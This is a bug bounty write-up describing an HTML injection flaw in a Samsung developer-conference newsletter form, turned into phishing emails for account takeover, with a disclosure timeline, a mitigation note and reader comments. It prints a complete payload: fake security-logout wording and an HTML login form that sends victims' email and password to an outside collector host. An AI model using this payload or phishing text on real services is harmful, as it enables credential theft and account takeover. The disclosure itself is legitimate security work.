InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties…

Follow publication

HTMLI to ATO leads to $$$ bounty 🤑

Hello Hackers, In this writeup I am going to discuss my recent finding on Samsung, like how I found the bug and as a award they awarded me $$$ for my finding. And this was my second bounty and it was my first bounty in dollars 🥳. So let’s deep dive into the vulnerability.

created by author using DALL-E

During testing on Samsung, firstly I performed different google dorks.

NOTE: If you want to learn about dorking like shodan, google and more then you can learn it from my best friend and mentor AbhirupKonwar writeups in which he included lots of unique techniques you can use to use during bug hunting.

Advanced Google Dorking

25 stories

So, I come up with the subdomain called https://www.samsungdeveloperconference.com/ in which I found a Newsletter subscription in which the user give it’s first name and last name and email to subscribe to newsletter and the page looks like this:

Newsletter Subscription

So, to test for HTML injection I simply give my email address and add payloads in to the first name and last name fields and click on subscribe and guess what my payload works and I successfully found HTMLI in Email and to show impact I show them phishing leads to ATO full working poc.

Payload in firstname:
Dear Team

As part of our commitment to security, we have logged you out of your accounts due to recent updates in our system protocols. To ensure the safety and integrity of your account, please re-login using the secure link provided below.

<html>
<body>
<form action="https://burpcolloborator.com">Login again for security:<br><br>
<label for="u">Email id:
<input type="text" id="u" name="u"><br><br>
<label for="p">Password:
<input type="password" id="p" name="p"><br></br>
<input type="submit" value="Submit">
</body>
</html>

Payload in lastname:
If you encounter any issues or have questions, feel free to reach out to our IT support team at. We appreciate your cooperation in keeping our systems secure.

Thank you for your understanding.

Best Regards,
Samsung Developer
<!--

The email with malicious payload looks like this:

HTMLI in email

Now as victim adds the detail like email and password and boom an attacker will easily get victim’s credentials and thus an attacker can takeover victim account and note that the mail come from samsung email address which also increase the trust to victim to enter the credentials.

And after all the reporting samsung team has good response time and they awarded me $$$ bounty 🤑for the report and mark my report as a LOW severity 🤔 I think this should at least P3 or medium severity don’t you think?

$$$ bounty 🤑

Mitigation of HTMLI:

As a mitigation of this bug samsung team make a proper whitelist of the characters and implements proper checks for >,<,.,,,”,’,%, etc this words. which was implement not only client side but they also implemented this in server side checks so that this is totally next to impossible to bypass this bug.

Timeline:

2024-11-13: Reported

2024–11–26: Confirmed the bug was valid

2024–12–13: I told them that fix was already deployed and ask for updates

2024–12–18: They confirm that the fix was deployed and marked the severity as LOW

2025–01–06: Assure me that the bugcrowd team will contact me soon and decided to award me $$$ 🤑

2025–01–11: Asked to recheck the severity and suggest to increase it to P3.

2025–01–16: They denied to increase the severity.

2025–02–17: Awarded my very first bounty in $$$ 🥳

Awarded bounty through bugcrowd 🥰

You can read my other articles:

I hope you found this writeup helpful and you also motivate to hunt for more and the consistency, persistence is the main key in this field. I will see you in amazing one. Till then bye 👋

Sign up to discover human stories that deepen your understanding of the world.

Published in InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. Subscribe to our weekly newsletter for the coolest infosec updates: https://weekly.infosecwriteups.com/

Written by cryptoshant🇮🇳

Ethical Hacker | Bug Hunter🐞 | Offensive Security | Student | Cybersecurity Enthusiast ⚡

Responses (6)

Write a response

🔥🔥Congrats buddy! More to come
Thanks for mentioning me 🤗🤗

--

Congratulations brother, i have a doubt bro where to inject that htmli? In login forms? You say first name and last name field ? Then you would inject this payload two times?

--

Epic brother well done. Congratulations !

--